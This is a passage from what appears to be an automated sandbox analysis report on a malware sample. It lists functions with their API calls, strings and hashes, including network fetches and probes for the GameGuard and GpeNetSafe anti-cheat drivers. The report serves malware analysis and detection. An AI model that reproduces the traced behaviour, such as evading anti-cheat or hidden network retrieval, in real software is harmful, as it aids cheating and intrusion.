                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6A6FDC55
                                                                                    • Part of subcall function 6A706D40: __FindPESection.LIBCMT ref: 6A706D9B
                                                                                  • __getptd_noexit.LIBCMT ref: 6A6FDC65
                                                                                  • CloseHandle.KERNEL32(?,?,6A6FDCB0), ref: 6A6FDC79
                                                                                  • __freeptd.LIBCMT ref: 6A6FDC80
                                                                                  • ExitThread.KERNEL32 ref: 6A6FDC88
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                                  • String ID:
                                                                                  • API String ID: 3798957060-0
                                                                                  • Opcode ID: 19d5f3c073f5af7270c8ad3d47f349f281334218dfc46c85136eed8066c9f6af
                                                                                  • Instruction ID: a3b241056a6b3a01b0a406298669f0dfd3ecbacb112d21a3fc96fe4a7b0e6eaf
                                                                                  • Opcode Fuzzy Hash: 19d5f3c073f5af7270c8ad3d47f349f281334218dfc46c85136eed8066c9f6af
                                                                                  • Instruction Fuzzy Hash: ADE08671501A1197D6011BB1CA5D71E3ADD5F02629F564624E53AD60C4EFA0ED47CA60
                                                                                  Function 00440A40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00440A60
                                                                                    • Part of subcall function 0043DEB0: _memset.LIBCMT ref: 0043DEC5
                                                                                    • Part of subcall function 0043DEB0: _malloc.LIBCMT ref: 0043DEE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_malloc
                                                                                  • String ID: L(D$L(D
                                                                                  • API String ID: 3506388080-578281039
                                                                                  • Opcode ID: 4f718b1c46b128c1664b92d3acf0f314b35a95a1eaa5fb7d09bff6526f5f001f
                                                                                  • Instruction ID: 21c6e696863d271599e25ea5ca70299bb0a7b37a32b05db971291e3e70fbc5ee
                                                                                  • Opcode Fuzzy Hash: 4f718b1c46b128c1664b92d3acf0f314b35a95a1eaa5fb7d09bff6526f5f001f
                                                                                  • Instruction Fuzzy Hash: 8E715EB1D00209DBEF24DF99DC81BDEB7B9AF44314F108299E618A7381E734AA94CF55
                                                                                  Function 6A6F2DA4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A6F2DAB
                                                                                  • UrlUnescapeA.SHLWAPI(?,00000000,?,02000000,00000825,?,?,?,?,?,00000010,6A6E5EC0,?,00000001,00000001,00000000), ref: 6A6F2E44
                                                                                  • InternetOpenUrlA.WININET(?,?,?,?,?,00000001), ref: 6A6F2EBC
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                    • Part of subcall function 6A6F2CC9: __EH_prolog3.LIBCMT ref: 6A6F2CD0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3$InternetOpenUnescape_malloc
                                                                                  • String ID: GET
                                                                                  • API String ID: 2204432607-1805413626
                                                                                  • Opcode ID: aa6d29ba467106f96dfa8ae3e7c79eb99fa6643d555f42063fd56d38f7b8f4d9
                                                                                  • Instruction ID: 3ec69792133df554745a8caafd3820886b42583075326124d518fd9666988937
                                                                                  • Opcode Fuzzy Hash: aa6d29ba467106f96dfa8ae3e7c79eb99fa6643d555f42063fd56d38f7b8f4d9
                                                                                  • Instruction Fuzzy Hash: 2E51E27155428AABDF01CFB4C848AEE7BB6EF05304F114959F925A6291DF308A02CF61
                                                                                  Function 00434D70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00434D9E
                                                                                  • select.WS2_32(?,?,00000000,00000000,00000000,00000003), ref: 00434E7F
                                                                                  • recv.WS2_32(?,?,00000000,00000001,00000000), ref: 00434EDF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memsetrecvselect
                                                                                  • String ID: @
                                                                                  • API String ID: 159336290-2766056989
                                                                                  • Opcode ID: d8cbad4057f2236b23156f1105cf5a4488466af88927e3c537b143150fce611e
                                                                                  • Instruction ID: 8639176ce9e2c90a1c902ce5fd2cad3ab3f0d4ca1ebb1ebca9a2f53658f1b4ef
                                                                                  • Opcode Fuzzy Hash: d8cbad4057f2236b23156f1105cf5a4488466af88927e3c537b143150fce611e
                                                                                  • Instruction Fuzzy Hash: 9D514C709006589FDF24CF48CC95BEEB7B5BB8930AF2090DAD51967240C778AE858F5A
                                                                                  Function 6A6E25D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6E25F2
                                                                                  • OutputDebugStringA.KERNEL32(?,00000000,?,6A6E2A89,?), ref: 6A6E261C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6E2623
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s
                                                                                  • String ID: C:\123.txt
                                                                                  • API String ID: 4089825709-757984348
                                                                                  • Opcode ID: e701be474b379bb5065d30ae5742dbe678e871a3dff29cc6167da405358e01e1
                                                                                  • Instruction ID: bf2988fdf1010627d1fdcd05f9d9c94cd6be5fbec2546b9f134351b3ecf54d9c
                                                                                  • Opcode Fuzzy Hash: e701be474b379bb5065d30ae5742dbe678e871a3dff29cc6167da405358e01e1
                                                                                  • Instruction Fuzzy Hash: BFE0D8B281E101B7DB1097B0DD40E9B77EA7B96610F05495EF24543240DE74DD08DBD2
                                                                                  Function 6A6E1B30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DBF00: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                    • Part of subcall function 6A6DBF00: GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • CreateFileA.KERNELBASE(\\.\GpeNetSafe,00000000,00000003,00000000,00000003,00000080,00000000), ref: 6A6E1B66
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E1B72
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$AddressCloseCreateFileModuleProc
                                                                                  • String ID: \\.\GameGuard$\\.\GpeNetSafe
                                                                                  • API String ID: 1058200188-3021087753
                                                                                  • Opcode ID: c513e301da69a89b16e4f7cfb647e112f0666602e35e188abb91655df8e9837d
                                                                                  • Instruction ID: e562d10d08f14f2267208daf4b82ba6648c7a3c6b0cb5a82632cd2ffcc90e078
                                                                                  • Opcode Fuzzy Hash: c513e301da69a89b16e4f7cfb647e112f0666602e35e188abb91655df8e9837d
                                                                                  • Instruction Fuzzy Hash: 1BE0C2B0A8F128B2E53017B69C0EFC7A85C7B23BA0F010235BA2CF50D4ED408E455AF4
                                                                                  Function 6A6E25E9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6E25F2
                                                                                  • OutputDebugStringA.KERNEL32(?,00000000,?,6A6E2A89,?), ref: 6A6E261C
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6E2623
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s
                                                                                  • String ID: C:\123.txt
                                                                                  • API String ID: 4089825709-757984348
                                                                                  • Opcode ID: cf376fba3bc5d8305d0c586569837c59b96e019811ab54baa88b57e1853b81ac
                                                                                  • Instruction ID: 39f689e66f1289e1c0b5e38160e0f7b28181632d7d3fecd27bd121fe917258d7
                                                                                  • Opcode Fuzzy Hash: cf376fba3bc5d8305d0c586569837c59b96e019811ab54baa88b57e1853b81ac
                                                                                  • Instruction Fuzzy Hash: 97E07DB280D10073FB1057B08C05E9B37EABB95120F050C2EF54143240DE38E804DBD3
                                                                                  Function 00416790 Relevance: 6.2, APIs: 4, Instructions: 203COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen$_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1297213449-0
                                                                                  • Opcode ID: d7a096dd006aa4182c39d2a1ecdf5f66a1f252bb53dc91ff44b0042f0c482972
                                                                                  • Instruction ID: ce9af1a0c974c58608db0d687cffdb2de7b16efc76ad5b7231e8d65efd7973ce
                                                                                  • Opcode Fuzzy Hash: d7a096dd006aa4182c39d2a1ecdf5f66a1f252bb53dc91ff44b0042f0c482972
                                                                                  • Instruction Fuzzy Hash: 03811AB1D01208DBDB14EFE5C991BEEB7B4BF44304F10816EE50A6B285DB789A89CF45
                                                                                  Function 0046E4EF Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fileno__flsbuf__flush__locking
                                                                                  • String ID:
                                                                                  • API String ID: 2259706978-0
                                                                                  • Opcode ID: cfef0ba332e745520449f85590ff801de13d32270ac17a53e582e94922ae2b5c
                                                                                  • Instruction ID: 06ccee0b16737b41ee0b74f75ec00d20dd497f6fda8f4cd82751ab3a5a18cd7a
                                                                                  • Opcode Fuzzy Hash: cfef0ba332e745520449f85590ff801de13d32270ac17a53e582e94922ae2b5c
                                                                                  • Instruction Fuzzy Hash: 8A41B775A00604EFDB249FABC44459FB7F6AF90354F24852EE41697250F738DE41CB4A
                                                                                  Function 6A6F443C Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: __msize_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1288803200-0
                                                                                  • Opcode ID: 7a12a935bcad3e67edf897122f4ed0a237912baa29958302bc64ee5ded98b9d2
                                                                                  • Instruction ID: 97122e3b08422adf173ead12324efbd1d25256d034cf7fefbeabba221227094d
                                                                                  • Opcode Fuzzy Hash: 7a12a935bcad3e67edf897122f4ed0a237912baa29958302bc64ee5ded98b9d2
                                                                                  • Instruction Fuzzy Hash: 6821E3712006019FCB04AFB5D98CA5E77E7BF41729B138E2AD828CB996DF70D942C784
                                                                                  Function 0046FF35 Relevance: 6.1, APIs: 4, Instructions: 73threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___set_flsgetvalue.LIBCMT ref: 0046FF66
                                                                                  • __getptd.LIBCMT ref: 0046FF7F
                                                                                  • CreateThread.KERNEL32(00000000,?,?,0046FEB2,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0046FFB7
                                                                                  • __dosmaperr.LIBCMT ref: 0046FFD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateThread___set_flsgetvalue__dosmaperr__getptd
                                                                                  • String ID:
                                                                                  • API String ID: 1707747371-0
                                                                                  • Opcode ID: d78431cb78b1feb8c22ea34818dc73b4bf26f85fe20150d14942048ae1f3466d
                                                                                  • Instruction ID: 9c9aabf1cc2e0f7b26fd02b4dd25b14ec26b24368bdf925aab8a1f20f914a246
                                                                                  • Opcode Fuzzy Hash: d78431cb78b1feb8c22ea34818dc73b4bf26f85fe20150d14942048ae1f3466d
                                                                                  • Instruction Fuzzy Hash: EF112772500209BFCB14BFA5EC82DDF7BA9EF05328B10403FF54493152FA79E905866A
                                                                                  Function 0040A170 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SEVI.A2F0JLEKS(004A3178,004A8494,0000006F), ref: 0040A193
                                                                                  • _malloc.LIBCMT ref: 0040A19B
                                                                                  • GDTAN.A2F0JLEKS(00000000,00000000), ref: 0040A1C9
                                                                                  • _memset.LIBCMT ref: 0040A1F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4137368368-0
                                                                                  • Opcode ID: aa460d68aca43c8e7e8e79447e390b8a9e2f0a881d02a974bb104a080f0918dd
                                                                                  • Instruction ID: a0e38026e611866aa353f6431d92be8e486c50510d4e761fe6a5d33fcf09cce1
                                                                                  • Opcode Fuzzy Hash: aa460d68aca43c8e7e8e79447e390b8a9e2f0a881d02a974bb104a080f0918dd
                                                                                  • Instruction Fuzzy Hash: A42180B5D00208EBDB04EF94DD45B9EB7B9FB48304F10846DE10167382E7355A54DB96
                                                                                  Function 0040BC50 Relevance: 6.1, APIs: 4, Instructions: 63fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040BC6D
                                                                                  • _malloc.LIBCMT ref: 0040BC92
                                                                                  • CloseHandle.KERNEL32(000000FF,00000000), ref: 0040BCA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateFileHandle_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1023042539-0
                                                                                  • Opcode ID: 4e0c1e11b8b8608c3776cd67ac3699148c11d62add599dbc2492f1dd7e870dd6
                                                                                  • Instruction ID: 07d0136e426709b88d10320fc0a1e536b7c2563b7f6f6474431193a2c3ba90bd
                                                                                  • Opcode Fuzzy Hash: 4e0c1e11b8b8608c3776cd67ac3699148c11d62add599dbc2492f1dd7e870dd6
                                                                                  • Instruction Fuzzy Hash: C21133B5E04209FBDB10DFA4CC85FAEB774FB08710F104969EA15B7280DB75A640DB99
                                                                                  Function 0040CB7D Relevance: 6.1, APIs: 4, Instructions: 62fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite_memset_strlen_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3822394006-0
                                                                                  • Opcode ID: 138254a6a14320c8fb10da1918255b96fe7145a54ade7a88f003c70ac1c196f0
                                                                                  • Instruction ID: 1543f2037532d57d8d2aa3df7236ee0c90c9d9c03e8b42313fe186e0fb002e13
                                                                                  • Opcode Fuzzy Hash: 138254a6a14320c8fb10da1918255b96fe7145a54ade7a88f003c70ac1c196f0
                                                                                  • Instruction Fuzzy Hash: 51213BB4D00208EFDB04DF95D981BAEB7B4AF48308F10826AE51577382D7749E44CF55
                                                                                  Function 0040BA60 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 0040BA88
                                                                                    • Part of subcall function 0040B300: WSAStartup.WS2_32(?,00000202,?), ref: 0040B358
                                                                                    • Part of subcall function 0040B300: __strlwr.LIBCMT ref: 0040B383
                                                                                  • _memset.LIBCMT ref: 0040BAB4
                                                                                  • _strlen.LIBCMT ref: 0040BAC3
                                                                                  • _strlen.LIBCMT ref: 0040BAE9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strlen$Startup__strlwr
                                                                                  • String ID:
                                                                                  • API String ID: 1643724437-0
                                                                                  • Opcode ID: cabb4d34b633b183f064646b1d24c3a9568ed163d0e0a39e72b7543255ba6b68
                                                                                  • Instruction ID: a3e12426b565d0242951bfb941bcea3522308458b44689d814154d4837b7505d
                                                                                  • Opcode Fuzzy Hash: cabb4d34b633b183f064646b1d24c3a9568ed163d0e0a39e72b7543255ba6b68
                                                                                  • Instruction Fuzzy Hash: 5811CCF5D4010C96D714E761AC87BD9737C5B14308F0005EDA509A6282FAF9AB88CBD6
